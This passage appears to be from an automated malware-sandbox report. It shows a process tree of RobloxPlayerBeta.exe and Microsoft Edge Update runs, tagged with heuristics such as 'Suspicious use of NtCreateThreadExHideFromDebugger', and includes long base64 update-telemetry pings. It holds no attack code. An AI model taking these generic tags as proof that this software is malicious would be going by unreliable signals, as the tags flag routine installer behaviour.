                                                                                                                      • C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\RobloxPlayerBeta.exe
                                                                                                                        "C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\RobloxPlayerBeta.exe"
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                                        PID:3264
                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x530 0x534
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3804
                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks system information in the registry
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1116
                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks system information in the registry
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4152
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{A8D5EB8C-62EA-4AE1-A5D4-15EFF98F2A65}\MicrosoftEdgeUpdateSetup_X86_1.3.185.27.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{A8D5EB8C-62EA-4AE1-A5D4-15EFF98F2A65}\MicrosoftEdgeUpdateSetup_X86_1.3.185.27.exe" /update /sessionid "{F9722604-B987-411B-96D5-02C3583CDBEE}"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          PID:1972
                                                                                                                          • C:\Program Files (x86)\Microsoft\Temp\EU9114.tmp\MicrosoftEdgeUpdate.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Temp\EU9114.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{F9722604-B987-411B-96D5-02C3583CDBEE}"
                                                                                                                            3⤵
                                                                                                                            • Sets file execution options in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Checks system information in the registry
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2816
                                                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Modifies registry class
                                                                                                                              PID:5856
                                                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Modifies registry class
                                                                                                                              PID:5924
                                                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.185.27\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.185.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Registers COM server for autorun
                                                                                                                                • Modifies registry class
                                                                                                                                PID:2576
                                                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.185.27\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.185.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Registers COM server for autorun
                                                                                                                                • Modifies registry class
                                                                                                                                PID:712
                                                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.185.27\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.185.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Registers COM server for autorun
                                                                                                                                • Modifies registry class
                                                                                                                                PID:3516
                                                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Rjk3MjI2MDQtQjk4Ny00MTFCLTk2RDUtMDJDMzU4M0NEQkVFfSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7RTcxMDJCOEYtMzJDMC00RUI2LUI5Q0UtMUE2OEY2QkRGOEQ5fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IkRBRFkiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTcxLjM5IiBuZXh0dmVyc2lvbj0iMS4zLjE4NS4yNyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjM1IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MDg5ODUyOTkiPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMzU2OTgzNTMzIi8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks system information in the registry
                                                                                                                              PID:2852
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Rjk3MjI2MDQtQjk4Ny00MTFCLTk2RDUtMDJDMzU4M0NEQkVFfSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0MDNCRUM3Ri02QjM1LTQyRkEtQUI0My1EQjBGQ0VFRjYzRjd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzEuMzkiIG5leHR2ZXJzaW9uPSIxLjMuMTg1LjI3IiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMzUiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMDcwNzM0ODIzIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMDcwOTMzNTg4IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMTI5MjE4MTUxOCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2FiNzMwZTJhLThkNWUtNGYwMS04ZjhhLTcxZDc3YjliYjc4NT9QMT0xNzEyNjM1NTM2JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUVBeW9vajBNOXZ0QnIza1M4SWJDbWduZUc2MHozMm9Zb1VvQ1VrZmFOS1BGM2NtSkd6b3RjUDg0ZFN4a2lYT2tMMm82OUtxQmFLUkxENDdZRiUyZmo0VlElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIwIiB0b3RhbD0iMCIgZG93bmxvYWRfdGltZV9tcz0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMTI5MjE4MTUxOCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYWI3MzBlMmEtOGQ1ZS00ZjAxLThmOGEtNzFkNzdiOWJiNzg1P1AxPTE3MTI2MzU1MzYmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9RUF5b29qME05dnRCcjNrUzhJYkNtZ25lRzYwejMyb1lvVW9DVWtmYU5LUEYzY21KR3pvdGNQODRkU3hraVhPa0wybzY5S3FCYUtSTEQ0N1lGJTJmajRWUSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE2MjE5NzYiIHRvdGFsPSIxNjIxOTc2IiBkb3dubG9hZF90aW1lX21zPSIxNzYxMiIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMTI5MjIzMjQxNSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMTI5Nzc1ODU1MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxwaW5nIHI9IjM2IiByZD0iNjI2NSIgcGluZ19mcmVzaG5lc3M9Ins3NkEwNTc4Ni1ERTVDLTRBQzktOTQxNC1GQUNEM0VGMUNBMUZ9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkyLjAuOTAyLjY3IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjM1IiBsYXN0X2xhdW5jaF90aW1lPSIxMzM1NjUwMzc1MDU2Mjg5MTAiPjx1cGRhdGVjaGVjay8-PHBpbmcgYWN0aXZlPSIxIiBhPSItMSIgcj0iMzYiIGFkPSItMSIgcmQ9IjYyNjUiIHBpbmdfZnJlc2huZXNzPSJ7MTI4MDcwOTgtN0E4MC00N0IxLTk4MkUtQkFGOUYxMzMyQ0M2fSIvPjwvYXBwPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIxMjMuMC4yNDIwLjY1IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMCIgaW5zdGFsbGRhdGU9IjYzMDAiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iLTEiIHJkPSItMSIgcGluZ19mcmVzaG5lc3M9Ins0NjM4NjZCNy05OTU5LTQ3QzItQUY3NC01MEZCN0NBNjk4QTN9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks system information in the registry
                                                                                                                          PID:3744
                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4080
                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks system information in the registry
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:5176
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDUyNDNCREItNEQzRi00MTY5LUIyQ0YtQTA3RTgxQ0ZBNzk2fSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RTZENTdGQzEtQUM2Qy00Q0NFLUJFQUQtNkU1Q0IxRjMzQzREfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IkRBRFkiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtEVjBqSS9LRGx4aEh1ZTFMOUtSR0djcU9oZjNIM2gzYWNTckVhblFLZmdRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMDYuMC41MjQ5LjExOSIgbmV4dHZlcnNpb249IiIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMzUiIGluc3RhbGxkYXRldGltZT0iMTcwODk1NzkzNiIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzUzNDU4ODk5MDAwMDAwMCIgZmlyc3RfZnJlX3NlZW5fdGltZT0iMTMzNTY1MDM4NTg5NDYzNDAzIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjMxMDY3NiIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQzNDA2NzA0ODUiLz48L2FwcD48L3JlcXVlc3Q-
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks system information in the registry
                                                                                                                          PID:3916
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4636F15C-016F-47CB-8302-66B86A71F767}\BGAUpdate.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4636F15C-016F-47CB-8302-66B86A71F767}\BGAUpdate.exe" --edgeupdate-client --system-level
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          PID:4628
                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDUyNDNCREItNEQzRi00MTY5LUIyQ0YtQTA3RTgxQ0ZBNzk2fSIgdXNlcmlkPSJ7NUFEQjU0NEYtQzA0MC00NDQzLTg3QzktMzZGNDlFOEFGMUZCfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntDQjFGQ0IxNS1EMDkwLTRCOTItQjFEQi04NDQwODYyQzA2N0R9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezFGQUI4Q0ZFLTk4NjAtNDE1Qy1BNkNBLUFBN0QxMjAyMTk0MH0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjIuMC4wLjMyIiBsYW5nPSIiIGJyYW5kPSJFVUZJIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQzNTkxMjY2MzgiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDM1OTU0NjU5OCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDg5MDQwMzM1MiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2YwNDJjMGU5LTI2M2QtNGMxYS1iMzNlLWExZmU5MDZhOWJlZj9QMT0xNzEyNjM1ODY1JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWpWJTJiRTRSUEFGJTJidTUlMmJwaFNkUFlVb2JkOVlaNW5zOXJ2OWxCZTJhYzJhJTJmbnNyUEVaVzRsRVdUWWlXMGpBdSUyYmJHZWlxR2JHZiUyZjJaWE5zWHZpWjNRVDhnJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjIxIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQ4OTA0MTMyMzYiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2YwNDJjMGU5LTI2M2QtNGMxYS1iMzNlLWExZmU5MDZhOWJlZj9QMT0xNzEyNjM1ODY1JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWpWJTJiRTRSUEFGJTJidTUlMmJwaFNkUFlVb2JkOVlaNW5zOXJ2OWxCZTJhYzJhJTJmbnNyUEVaVzRsRVdUWWlXMGpBdSUyYmJHZWlxR2JHZiUyZjJaWE5zWHZpWjNRVDhnJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTgwNDgwMzIiIHRvdGFsPSIxODA0ODAzMiIgZG93bmxvYWRfdGltZV9tcz0iNDgyMjQiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDg5MDQ1MzE2MiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjYiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE0ODk4MDg2MjkwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQ5MDE5MTM1NDMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSIxMDMyIiBkb3dubG9hZF90aW1lX21zPSI1MzAyNSIgZG93bmxvYWRlZD0iMTgwNDgwMzIiIHRvdGFsPSIxODA0ODAzMiIgcGFja2FnZV9jYWNoZV9yZXN1bHQ